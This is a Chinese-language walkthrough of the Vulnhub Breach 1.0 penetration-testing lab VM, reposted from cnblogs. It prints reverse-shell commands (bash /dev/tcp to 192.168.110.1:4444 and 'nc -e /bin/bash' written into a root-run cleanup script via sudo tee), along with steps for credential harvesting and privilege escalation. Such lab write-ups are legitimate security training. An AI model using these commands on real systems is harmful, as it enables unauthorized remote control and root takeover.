经验首页 前端设计 程序设计 Java相关 移动开发 数据库/运维 软件/图像 大数据/云计算 其他经验
当前位置:技术经验 » 其他 » 网络安全 » 查看文章
Vulnhub靶场渗透练习(一) Breach1.0
来源:cnblogs  作者:痱子﹑  时间:2019/7/8 8:48:27  对本文有异议

 

 

打开靶场 固定ip需要更改虚拟机为仅主机模式 192.168.110.140

打开网页http://192.168.110.140/index.html

查看源代码发现可以加密字符串

猜测base64 解密  cGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh  得到这个结果可能是二次加密在base64解密

得到 pgibbons:damnitfeel$goodtobeagang$ta  去除:    得到两个字符串pgibbons,damnitfeel$goodtobeagang$ta

点击图片每个路径都看看发现

可以登录 把刚刚拿到的两个密码进行尝试登录

登录成功 发现有3个邮件

192.168.110.140/.keystore   这个地址 为 ssl 加密证书的密钥库   继续搜索有用文件

 

 发现 有信息泄露 通过邮件信息猜测 tomcat 

发现  pcap 文件 为 wireshark  流量包 可以下载来分析

都是加密过的  可以利用前面的ssl 解密  利用java 的 keytool 获取证书  输入

D:\jdk\bin>keytool.exe -list -keystore 

输入密钥库口令:tomcat
密钥库类型: jks
密钥库提供方: SUN

您的密钥库包含 1 个条目

tomcat, 2016-5-21, PrivateKeyEntry,
证书指纹 (SHA1): D5:D2:49:C3:69:93:CC:E5:39:A9:DE:5C:91:DC:F1:26:A6:40:46:53

Warning:
JKS 密钥库使用专用格式。建议使用 "keytool -importkeystore -srckeystore D:\jdk\keystore -destkeystore D:\jdk\keystore -deststoretype pkcs12" 迁移到行业标准格式 PKCS12。  

解密出来 结果

接着导出 p12 证书

输入

  1. keytool -importkeystore -srckeystore D:\jdk\keystore -destkeystore D:\tomcatkeystore.p12 -deststoretype PKCS12
  2. -srcalias tomcat

 

证书有了 我们就可以查看了 打开Wireshark  编辑--首选项--Protocols--SSL,点击右边的Edit:

 

输入:192.168.110.140 8443 http 点击选择证书文件 输入密码tomcat

 

发现包含登录用户名密码的数据包, 采用http basic认证,认证数据包为: Basic
dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC
这是base64编码的用户名密码,将 dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC 复制到Burpsuit Decoder进行解码,
得到Tomcat登录用户名密码
Tomcat后台登录用户名:tomcat,密码:Tt\5D8F(#!*u=G)4m7zB
拿到密码 后 可以直接登录

 

Tomcat 后台是直接可以获取getshell 
 

这里上传马以后每隔3分钟会自动删除 所以我们直接利用他反弹一个shell 这里可以用linux 自带的也可以 用msf 生成

 echo "bash -i >& /dev/tcp/192.168.110.1/4444 0>&1" | bash

本机 输入 nc.exe -lvp 4444

进入项目后直接可以查看项目寻找到 两个特殊文件

看到mysql 的用户密码

 

输入 

mysql -u root -p  回车 密码空 在回车
mysql -u root -p
use mysql;
select user,password from user;
exit

发现 milton 用户   去 etc/passwd 

发现对应用户 猜测就是这个用户密码 

到 https://www.somd5.com/ 解密,得到用户milton的明文密码:thelaststraw
切换 su -milton   用户
无法执行su命令,显示需要一个终端,之前都遇到这个问题,通过Python解决:
python -c 'import pty;pty.spawn("/bin/bash")'  

接着查询这个用户能否sudo   执行

sudo -l

没发现可利用的   再从新找线索

uname -a 

系统内核版本为:Linux Breach 4.2.0-27-generic,不存在Ubuntu本地提权漏洞。存在本地提权漏洞内核版本是:Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04)
查找历史命令发现
su提权到了blumbergh用户。需要找到blumbergh用户的密码。将可用的资源文件下载发现
bill.png  底部是插入编码 可能是二次隐藏密码  

tEXtComment  和coffeestains

利用这两个尝试登录

登录成功

用户名:blumbergh 密码:coffeestains
查sudo 权限
  1. blumbergh@Breach:~$ sudo -l
  2. sudo -l
  3. Matching Defaults entries for blumbergh on Breach:
  4. env_reset, mail_badpass,
  5. secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
  6. User blumbergh may run the following commands on Breach:
  7. (root) NOPASSWD: /usr/bin/tee /usr/share/cleanup/tidyup.sh

能够以root 权限执行  

  1. /usr/bin/tee /usr/share/cleanup/tidyup.sh

在去查看历史命令

发现/usr/share/cleanup和tidyup.sh脚本文件:
执行 
  1. cd /
  2. blumbergh@Breach:/$ cd usr
  3. cd usr
  4. blumbergh@Breach:/usr$ cd share
  5. cd share
  6. blumbergh@Breach:/usr/share$ cd cleasnup
  7. cd cleasnup
  8. -su: cd: cleasnup: No such file or directory
  9. blumbergh@Breach:/usr/share$ cd cleanup
  10. cd cleanup

 

cat tidyup.sh

 得到
  1. #!/bin/bash
  2. #Hacker Evasion Script
  3. #Initech Cyber Consulting, LLC
  4. #Peter Gibbons and Michael Bolton - 2016
  5. #This script is set to run every 3 minutes as an additional defense measure against hackers.
  6. cd /var/lib/tomcat6/webapps && find swingline -mindepth 1 -maxdepth 10 | xargs rm -rf

3分钟删除一次刚刚上马的路径

 刚刚看到 这个用户能够执行tee 和 sh清除脚本
tee命令用于读取标准输入的数据,并将其内容输出成文件。tidyup.sh是清理脚本。以root权限运行
这里对linux 命令要解释一下 
cat 文件或者 echo ""   | tee -a  文件(要写到里面的文件) -a 不是覆盖是追加
全部我们执行
echo "nc -e /bin/bash 192.168.110.1 5555"| sudo /usr/bin/tee  /usr/share/cleanup/tidyup.sh

 

cat 查看

等待nc 反弹 

 

成功 记得 python -c 'import pty;pty.spawn("/bin/bash")'  显示终端

 

 
 

 

原文链接:http://www.cnblogs.com/yuanzijian-ruiec/p/11141954.html

 友情链接:直通硅谷  点职佳  北美留学生论坛

本站QQ群:前端 618073944 | Java 606181507 | Python 626812652 | C/C++ 612253063 | 微信 634508462 | 苹果 692586424 | C#/.net 182808419 | PHP 305140648 | 运维 608723728

W3xue 的所有内容仅供测试,对任何法律问题及风险不承担任何责任。通过使用本站内容随之而来的风险与本站无关。
关于我们  |  意见建议  |  捐助我们  |  报错有奖  |  广告合作、友情链接(目前9元/月)请联系QQ:27243702 沸活量
皖ICP备17017327号-2 皖公网安备34020702000426号